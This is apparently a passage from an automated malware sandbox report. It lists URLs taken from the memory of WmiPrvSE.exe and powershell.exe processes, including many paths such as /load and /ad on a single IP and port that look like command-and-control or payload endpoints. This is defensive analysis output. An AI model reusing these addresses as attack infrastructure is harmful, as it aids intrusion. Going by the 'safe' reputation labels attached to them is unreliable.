00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/ad	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/ad5F.J	WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load;F$J	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadYF	WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load5F.J	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611//F	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/GFxJ(	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadGFxJ(	WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load	WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load.215:59611/load	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2915107075.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load21	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744623374.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000009.00000002.1578339616.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1526031150.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1530745169.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1533999490.0000000005261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1534232115.0000000004771000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/qFbJ	WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/9	WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1578339616.0000000004B23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/92.215:59611/sX(J	WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/3X	WmiPrvSE.exe, 00000017.00000003.2110405360.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadnY	WmiPrvSE.exe, 00000017.00000003.2487435512.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:%u/	WmiPrvSE.exe, 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.1578339616.0000000004881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1526031150.0000000005401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1530745169.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1533999490.0000000005261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1534232115.0000000004771000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/HF	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2702600047.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/vFoJ	WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2614937061.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003064733.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1986031923.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1942591317.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load.215:59611/GFxJ(	WmiPrvSE.exe, 00000017.00000003.1859502443.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859652716.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1816810324.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/oad	WmiPrvSE.exe, 00000017.00000003.2571188057.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2487435512.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1578339616.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1600170411.00000000058EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1532861117.000000000646C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1557726516.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1566977272.00000000062CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/loadv	WmiPrvSE.exe, 00000017.00000002.3871035138.0000000000876000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load.215:59611/BFsJ	WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/92.215:59611/	WmiPrvSE.exe, 00000017.00000003.2614937061.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2573167366.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2744916674.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2703141614.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2871966353.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2529185949.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2786728505.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2658998770.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1586466556.0000000007003000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/kX	WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871392453.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2958845994.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3003282999.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3262236684.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2917034484.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load.215:59611/loadGFxJ(	WmiPrvSE.exe, 00000017.00000003.2786498639.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2828236471.0000000000884000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000011.00000002.1574214863.00000000057DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://45.76.192.215:59611/kFTJ	WmiPrvSE.exe, 00000017.00000003.2193216521.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2069006848.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2027594782.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3476773615.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2317905481.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3692641619.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2445561244.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3260883303.0000000000884000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2234623173.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2110405360.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.3044782894.000000000088A000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2151811936.000000000088D000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000002.3871035138.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/load.215:59611/adMFvJ&	WmiPrvSE.exe, 00000017.00000003.2403528765.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadkY	WmiPrvSE.exe, 00000017.00000003.3044782894.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733062615.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1774623238.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1733263656.00000000008B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.1534232115.00000000048F2000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/5F.J	WmiPrvSE.exe, 00000017.00000003.1691655729.000000000088A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadgY	WmiPrvSE.exe, 00000017.00000003.2445858657.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859777819.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901236743.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2359951438.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1859502443.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.1901055016.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000017.00000003.2404088001.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://45.76.192.215:59611/loadCY	WmiPrvSE.exe, 00000017.00000003.2276185057.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
